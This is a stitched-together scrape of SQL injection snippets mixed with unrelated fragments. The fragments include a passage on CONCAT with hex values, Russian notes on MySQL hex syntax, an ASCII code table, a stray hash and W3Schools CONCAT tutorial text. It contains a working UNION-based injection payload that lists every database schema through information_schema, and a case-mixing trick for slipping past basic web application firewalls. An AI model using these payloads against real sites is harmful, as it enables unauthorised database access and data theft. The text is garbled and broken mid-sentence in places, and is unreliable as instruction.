As a result, they just used `NULL values to populate those columns. The real confusion is in the CONCAT(). They are combining 126, 39, database name as hex value, 39, and 126. -- is a mysql comment - it ignores the rest of your query after. Judging from this attack...
Синтаксис: 0xHEX_ЧИСЛО (SM): SELECT CHAR(0x66) (S) SELECT 0x5045 (это не число, а
nul null byte \0 (zero) bel bel character \a bs backspace \b ht horizontal tab \t np formfeed \f nl newline \n cr carriage return \r. common ascii codes to know.
SELECT CONVERT(char(8), 0x4E616d65, 0) AS [Style 0, binary to character]
Query: ?param=’ AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(schema_name,0x0a) as CHAR(4096)) FROM (SELECT * FROM information_schema.schemata)a),3,4,5,6,7,8,9
901025b63b81fa0631f358c9be3ee6fdd7473ba6f08a14f4575ba4c2bce7d23bc37f5. Выходы. Индекс.
Instead of union UnIoN In some basic WAF’s this will work.
SELECT CONCAT("SQL ", "Tutorial ", "is ", "fun!") AS ConcatenatedString; Try it Yourself ». Definition and Usage. The CONCAT() function adds two or more expressions together. Note: Also look at the CONCAT_WS() function.